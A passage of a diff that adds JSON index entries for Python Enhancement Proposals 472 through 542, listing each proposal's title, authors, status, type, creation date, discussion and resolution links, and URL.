"https://peps.python.org/pep-0471/" + }, + "472": { + "number": 472, + "title": "Support for indexing with keyword arguments", + "authors": "Stefano Borini, Joseph Martinot-Lagarde", + "discussions_to": "python-ideas@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "24-Jun-2014", + "python_version": "3.6", + "post_history": "02-Jul-2014", + "resolution": "https://mail.python.org/pipermail/python-dev/2019-March/156693.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0472/" + }, + "473": { + "number": 473, + "title": "Adding structured data to built-in exceptions", + "authors": "Sebastian Kreft", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "29-Mar-2014", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2019-March/156692.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0473/" + }, + "474": { + "number": 474, + "title": "Creating forge.python.org", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Process", + "topic": "", + "created": "19-Jul-2014", + "python_version": null, + "post_history": "19-Jul-2014, 08-Jan-2015, 01-Feb-2015", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0474/" + }, + "475": { + "number": 475, + "title": "Retry system calls failing with EINTR", + "authors": "Charles-Fran\u00e7ois Natali, Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "29-Jul-2014", + "python_version": "3.5", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2015-February/138018.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0475/" + }, + "476": { + "number": 476, + "title": "Enabling certificate verification by default for stdlib http clients", + "authors": "Alex Gaynor", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "28-Aug-2014", + "python_version": "2.7.9, 3.4.3, 3.5", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2014-October/136676.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0476/" + }, + "477": { + "number": 477, + "title": "Backport ensurepip (PEP 453) to Python 2.7", + "authors": "Donald Stufft, Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Aug-2014", + "python_version": null, + "post_history": "01-Sep-2014", + "resolution": "https://mail.python.org/pipermail/python-dev/2014-September/136238.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0477/" + }, + "478": { + "number": 478, + "title": "Python 3.5 Release Schedule", + "authors": "Larry Hastings", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "22-Sep-2014", + "python_version": "3.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0478/" + }, + "479": { + "number": 479, + "title": "Change StopIteration 
handling inside generators", + "authors": "Chris Angelico, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Nov-2014", + "python_version": "3.5", + "post_history": "15-Nov-2014, 19-Nov-2014, 05-Dec-2014", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0479/" + }, + "480": { + "number": 480, + "title": "Surviving a Compromise of PyPI: End-to-end signing of packages", + "authors": "Trishank Karthik Kuppusamy, Vladimir Diaz, Justin Cappos, Marina Moore", + "discussions_to": "https://discuss.python.org/t/5666", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "08-Oct-2014", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": "458", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0480/" + }, + "481": { + "number": 481, + "title": "Migrate CPython to Git, Github, and Phabricator", + "authors": "Donald Stufft", + "discussions_to": null, + "status": "Withdrawn", + "type": "Process", + "topic": "", + "created": "29-Nov-2014", + "python_version": null, + "post_history": "29-Nov-2014", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0481/" + }, + "482": { + "number": 482, + "title": "Literature Overview for Type Hints", + "authors": "\u0141ukasz Langa", + "discussions_to": "python-ideas@python.org", + "status": "Final", + "type": "Informational", + "topic": "typing", + "created": "08-Jan-2015", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0482/" + }, + "483": { + "number": 483, + "title": "The Theory of Type Hints", + "authors": "Guido van Rossum, Ivan Levkivskyi", + "discussions_to": "python-ideas@python.org", + "status": "Final", + "type": "Informational", + "topic": "typing", + "created": "19-Dec-2014", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0483/" + }, + "484": { + "number": 484, + "title": "Type Hints", + "authors": "Guido van Rossum, Jukka Lehtosalo, \u0141ukasz Langa", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "29-Sep-2014", + "python_version": "3.5", + "post_history": "16-Jan-2015, 20-Mar-2015, 17-Apr-2015, 20-May-2015, 22-May-2015", + "resolution": "https://mail.python.org/pipermail/python-dev/2015-May/140104.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0484/" + }, + "485": { + "number": 485, + "title": "A Function for testing approximate equality", + "authors": "Christopher Barker", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-Jan-2015", + "python_version": "3.5", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2015-February/138598.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0485/" + }, + "486": { + "number": 486, + "title": "Make the Python Launcher aware of virtual environments", + "authors": "Paul Moore", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", 
+ "topic": "", + "created": "12-Feb-2015", + "python_version": "3.5", + "post_history": "12-Feb-2015", + "resolution": "https://mail.python.org/pipermail/python-dev/2015-February/138579.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0486/" + }, + "487": { + "number": 487, + "title": "Simpler customisation of class creation", + "authors": "Martin Teichmann", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Feb-2015", + "python_version": "3.6", + "post_history": "27-Feb-2015, 05-Feb-2016, 24-Jun-2016, 02-Jul-2016, 13-Jul-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-July/145629.html", + "requires": null, + "replaces": "422", + "superseded_by": null, + "url": "https://peps.python.org/pep-0487/" + }, + "488": { + "number": 488, + "title": "Elimination of PYO files", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-Feb-2015", + "python_version": "3.5", + "post_history": "06-Mar-2015, 13-Mar-2015, 20-Mar-2015", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0488/" + }, + "489": { + "number": 489, + "title": "Multi-phase extension module initialization", + "authors": "Petr Viktorin, Stefan Behnel, Alyssa Coghlan", + "discussions_to": "import-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "11-Aug-2013", + "python_version": "3.5", + "post_history": "23-Aug-2013, 20-Feb-2015, 16-Apr-2015, 07-May-2015, 18-May-2015", + "resolution": "https://mail.python.org/pipermail/python-dev/2015-May/140108.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0489/" + }, + "490": { + "number": 490, + "title": "Chain exceptions at C level", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "25-Mar-2015", + "python_version": "3.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0490/" + }, + "491": { + "number": 491, + "title": "The Wheel Binary Package Format 1.9", + "authors": "Daniel Holth", + "discussions_to": "distutils-sig@python.org", + "status": "Deferred", + "type": "Standards Track", + "topic": "packaging", + "created": "16-Apr-2015", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0491/" + }, + "492": { + "number": 492, + "title": "Coroutines with async and await syntax", + "authors": "Yury Selivanov", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "09-Apr-2015", + "python_version": "3.5", + "post_history": "17-Apr-2015, 21-Apr-2015, 27-Apr-2015, 29-Apr-2015, 05-May-2015", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0492/" + }, + "493": { + "number": 493, + "title": "HTTPS verification migration tools for Python 2.7", + "authors": "Alyssa Coghlan, Robert Kuska, Marc-Andr\u00e9 Lemburg", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "10-May-2015", + "python_version": 
"2.7.12", + "post_history": "06-Jul-2015, 11-Nov-2015, 24-Nov-2015, 24-Feb-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-March/143450.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0493/" + }, + "494": { + "number": 494, + "title": "Python 3.6 Release Schedule", + "authors": "Ned Deily", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "30-May-2015", + "python_version": "3.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0494/" + }, + "495": { + "number": 495, + "title": "Local Time Disambiguation", + "authors": "Alexander Belopolsky, Tim Peters", + "discussions_to": "datetime-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "02-Aug-2015", + "python_version": "3.6", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/datetime-sig/2015-September/000900.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0495/" + }, + "496": { + "number": 496, + "title": "Environment Markers", + "authors": "James Polley", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "packaging", + "created": "03-Jul-2015", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0496/" + }, + "497": { + "number": 497, + "title": "A standard mechanism for backward compatibility", + "authors": "Ed Schofield", + "discussions_to": null, + "status": "Rejected", + "type": "Process", + "topic": "", + "created": "04-Aug-2015", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0497/" + }, + "498": { + "number": 498, + "title": "Literal String Interpolation", + "authors": "Eric V. 
Smith", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-Aug-2015", + "python_version": "3.6", + "post_history": "07-Aug-2015, 30-Aug-2015, 04-Sep-2015, 19-Sep-2015, 06-Nov-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2015-September/141526.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0498/" + }, + "499": { + "number": 499, + "title": "``python -m foo`` should also bind ``'foo'`` in ``sys.modules``", + "authors": "Cameron Simpson, Chris Angelico, Joseph Jevnik", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "07-Aug-2015", + "python_version": "3.10", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0499/" + }, + "500": { + "number": 500, + "title": "A protocol for delegating datetime methods to their tzinfo implementations", + "authors": "Alexander Belopolsky, Tim Peters", + "discussions_to": "datetime-sig@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "08-Aug-2015", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/pipermail/datetime-sig/2015-August/000354.html", + "requires": "495", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0500/" + }, + "501": { + "number": 501, + "title": "General purpose template literal strings", + "authors": "Alyssa Coghlan, Nick Humrich", + "discussions_to": "https://discuss.python.org/t/pep-501-reopen-general-purpose-string-template-literals/24625", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "08-Aug-2015", + "python_version": "3.12", + "post_history": "`08-Aug-2015 `__, `05-Sep-2015 `__, `09-Mar-2023 `__,", + "resolution": null, + "requires": "701", + "replaces": null, + "superseded_by": "750", + "url": "https://peps.python.org/pep-0501/" + }, + "502": { + "number": 502, + "title": "String Interpolation - Extended Discussion", + "authors": "Mike G. Miller", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "", + "created": "10-Aug-2015", + "python_version": "3.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0502/" + }, + "503": { + "number": 503, + "title": "Simple Repository API", + "authors": "Donald Stufft", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "04-Sep-2015", + "python_version": null, + "post_history": "04-Sep-2015", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2015-September/026899.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0503/" + }, + "504": { + "number": 504, + "title": "Using the System RNG by default", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "15-Sep-2015", + "python_version": "3.6", + "post_history": "15-Sep-2015", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0504/" + }, + "505": { + "number": 505, + "title": "None-aware operators", + "authors": "Mark E. 
Haase, Steve Dower", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "18-Sep-2015", + "python_version": "3.8", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0505/" + }, + "506": { + "number": 506, + "title": "Adding A Secrets Module To The Standard Library", + "authors": "Steven D'Aprano", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Sep-2015", + "python_version": "3.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0506/" + }, + "507": { + "number": 507, + "title": "Migrate CPython to Git and GitLab", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Rejected", + "type": "Process", + "topic": "", + "created": "30-Sep-2015", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/pipermail/core-workflow/2016-January/000345.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0507/" + }, + "508": { + "number": 508, + "title": "Dependency specification for Python Software Packages", + "authors": "Robert Collins", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "11-Nov-2015", + "python_version": null, + "post_history": "05-Nov-2015, 16-Nov-2015", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2015-November/027868.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0508/" + }, + "509": { + "number": 509, + "title": "Add a private version to dict", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "04-Jan-2016", + "python_version": "3.6", + "post_history": "`08-Jan-2016 `__, `11-Jan-2016 `__, `14-Apr-2016 `__, `19-Apr-2016 `__", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/QFVJV6YQOUSWIYY4FBORY647YCBSCIMQ/", + "requires": null, + "replaces": null, + "superseded_by": "699", + "url": "https://peps.python.org/pep-0509/" + }, + "510": { + "number": 510, + "title": "Specialize functions with guards", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "04-Jan-2016", + "python_version": "3.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0510/" + }, + "511": { + "number": 511, + "title": "API for code transformers", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "04-Jan-2016", + "python_version": "3.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0511/" + }, + "512": { + "number": 512, + "title": "Migrating from hg.python.org to GitHub", + "authors": "Brett Cannon", + "discussions_to": "core-workflow@python.org", + "status": "Final", + "type": "Process", + "topic": "", + "created": "17-Jan-2015", + "python_version": null, + "post_history": "17-Jan-2016, 19-Jan-2016, 23-Jan-2016", + "resolution": null, + 
"requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0512/" + }, + "513": { + "number": 513, + "title": "A Platform Tag for Portable Linux Built Distributions", + "authors": "Robert T. McGibbon, Nathaniel J. Smith", + "discussions_to": "distutils-sig@python.org", + "status": "Superseded", + "type": "Informational", + "topic": "packaging", + "created": "19-Jan-2016", + "python_version": null, + "post_history": "19-Jan-2016, 25-Jan-2016, 29-Jan-2016", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2016-January/028211.html", + "requires": null, + "replaces": null, + "superseded_by": "600", + "url": "https://peps.python.org/pep-0513/" + }, + "514": { + "number": 514, + "title": "Python registration in the Windows registry", + "authors": "Steve Dower", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "02-Feb-2016", + "python_version": null, + "post_history": "02-Feb-2016, 01-Mar-2016, 18-Jul-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-July/145697.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0514/" + }, + "515": { + "number": 515, + "title": "Underscores in Numeric Literals", + "authors": "Georg Brandl, Serhiy Storchaka", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "10-Feb-2016", + "python_version": "3.6", + "post_history": "10-Feb-2016, 11-Feb-2016", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0515/" + }, + "516": { + "number": 516, + "title": "Build system abstraction for pip/conda etc", + "authors": "Robert Collins, Nathaniel J. Smith", + "discussions_to": "distutils-sig@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "26-Oct-2015", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/pipermail/distutils-sig/2017-May/030517.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0516/" + }, + "517": { + "number": 517, + "title": "A build-system independent format for source trees", + "authors": "Nathaniel J. Smith, Thomas Kluyver", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "30-Sep-2015", + "python_version": null, + "post_history": "01-Oct-2015, 25-Oct-2015, 19-May-2017, 11-Sep-2017", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2017-September/031548.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0517/" + }, + "518": { + "number": 518, + "title": "Specifying Minimum Build System Requirements for Python Projects", + "authors": "Brett Cannon, Nathaniel J. 
Smith, Donald Stufft", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "10-May-2016", + "python_version": null, + "post_history": "10-May-2016, 11-May-2016, 13-May-2016", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2016-May/028969.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0518/" + }, + "519": { + "number": 519, + "title": "Adding a file system path protocol", + "authors": "Brett Cannon, Koos Zevenhoven", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "11-May-2016", + "python_version": "3.6", + "post_history": "11-May-2016, 12-May-2016, 13-May-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-May/144646.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0519/" + }, + "520": { + "number": 520, + "title": "Preserving Class Attribute Definition Order", + "authors": "Eric Snow", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "07-Jun-2016", + "python_version": "3.6", + "post_history": "07-Jun-2016, 11-Jun-2016, 20-Jun-2016, 24-Jun-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-June/145442.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0520/" + }, + "521": { + "number": 521, + "title": "Managing global context via 'with' blocks in generators and coroutines", + "authors": "Nathaniel J. Smith", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "27-Apr-2015", + "python_version": "3.6", + "post_history": "29-Apr-2015", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0521/" + }, + "522": { + "number": 522, + "title": "Allow BlockingIOError in security sensitive APIs", + "authors": "Alyssa Coghlan, Nathaniel J. 
Smith", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "16-Jun-2016", + "python_version": "3.6", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/security-sig/2016-August/000101.html", + "requires": "506", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0522/" + }, + "523": { + "number": 523, + "title": "Adding a frame evaluation API to CPython", + "authors": "Brett Cannon, Dino Viehland", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-May-2016", + "python_version": "3.6", + "post_history": "16-May-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-August/145937.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0523/" + }, + "524": { + "number": 524, + "title": "Make os.urandom() blocking on Linux", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-Jun-2016", + "python_version": "3.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0524/" + }, + "525": { + "number": 525, + "title": "Asynchronous Generators", + "authors": "Yury Selivanov", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "28-Jul-2016", + "python_version": "3.6", + "post_history": "02-Aug-2016, 23-Aug-2016, 01-Sep-2016, 06-Sep-2016", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0525/" + }, + "526": { + "number": 526, + "title": "Syntax for Variable Annotations", + "authors": "Ryan Gonzalez, Philip House, Ivan Levkivskyi, Lisa Roach, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "09-Aug-2016", + "python_version": "3.6", + "post_history": "30-Aug-2016, 02-Sep-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-September/146282.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0526/" + }, + "527": { + "number": 527, + "title": "Removing Un(der)used file types/extensions on PyPI", + "authors": "Donald Stufft", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "23-Aug-2016", + "python_version": null, + "post_history": "23-Aug-2016", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2016-September/029624.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0527/" + }, + "528": { + "number": 528, + "title": "Change Windows console encoding to UTF-8", + "authors": "Steve Dower", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Aug-2016", + "python_version": "3.6", + "post_history": "01-Sep-2016, 04-Sep-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-September/146278.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0528/" + }, + "529": { + "number": 529, + "title": "Change Windows filesystem encoding to UTF-8", + "authors": "Steve Dower", + "discussions_to": null, + "status": 
"Final", + "type": "Standards Track", + "topic": "", + "created": "27-Aug-2016", + "python_version": "3.6", + "post_history": "01-Sep-2016, 04-Sep-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-September/146277.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0529/" + }, + "530": { + "number": 530, + "title": "Asynchronous Comprehensions", + "authors": "Yury Selivanov", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "03-Sep-2016", + "python_version": "3.6", + "post_history": "03-Sep-2016", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0530/" + }, + "531": { + "number": 531, + "title": "Existence checking operators", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "25-Oct-2016", + "python_version": "3.7", + "post_history": "28-Oct-2016", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0531/" + }, + "532": { + "number": 532, + "title": "A circuit breaking protocol and binary operators", + "authors": "Alyssa Coghlan, Mark E. Haase", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "30-Oct-2016", + "python_version": "3.8", + "post_history": "05-Nov-2016", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0532/" + }, + "533": { + "number": 533, + "title": "Deterministic cleanup for iterators", + "authors": "Nathaniel J. 
Smith", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "18-Oct-2016", + "python_version": null, + "post_history": "18-Oct-2016", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0533/" + }, + "534": { + "number": 534, + "title": "Improved Errors for Missing Standard Library Modules", + "authors": "Tom\u00e1\u0161 Orsava, Petr Viktorin, Alyssa Coghlan", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "05-Sep-2016", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0534/" + }, + "535": { + "number": 535, + "title": "Rich comparison chaining", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "12-Nov-2016", + "python_version": "3.8", + "post_history": null, + "resolution": null, + "requires": "532", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0535/" + }, + "536": { + "number": 536, + "title": "Final Grammar for Literal String Interpolation", + "authors": "Philipp Angerer", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "11-Dec-2016", + "python_version": "3.7", + "post_history": "`18-Aug-2016 `__, `23-Dec-2016 `__, `15-Mar-2019 `__", + "resolution": "https://discuss.python.org/t/pep-536-should-be-marked-as-rejected/35226/4", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0536/" + }, + "537": { + "number": 537, + "title": "Python 3.7 Release Schedule", + "authors": "Ned Deily", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "23-Dec-2016", + "python_version": "3.7", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0537/" + }, + "538": { + "number": 538, + "title": "Coercing the legacy C locale to a UTF-8 based locale", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "28-Dec-2016", + "python_version": "3.7", + "post_history": "03-Jan-2017, 07-Jan-2017, 05-Mar-2017, 09-May-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-May/148035.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0538/" + }, + "539": { + "number": 539, + "title": "A New C-API for Thread-Local Storage in CPython", + "authors": "Erik M. 
Bray, Masayuki Yamamoto", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-Dec-2016", + "python_version": "3.7", + "post_history": "16-Dec-2016, 31-Aug-2017, 08-Sep-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-September/149358.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0539/" + }, + "540": { + "number": 540, + "title": "Add a new UTF-8 Mode", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "05-Jan-2016", + "python_version": "3.7", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2017-December/151173.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0540/" + }, + "541": { + "number": 541, + "title": "Package Index Name Retention", + "authors": "\u0141ukasz Langa", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Process", + "topic": "packaging", + "created": "12-Jan-2017", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/pipermail/distutils-sig/2018-March/032089.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0541/" + }, + "542": { + "number": 542, + "title": "Dot Notation Assignment In Function Header", + "authors": "Markus Meskanen", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "10-Feb-2017", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2019-March/156695.html", + "requires": null, + "replaces": null, + 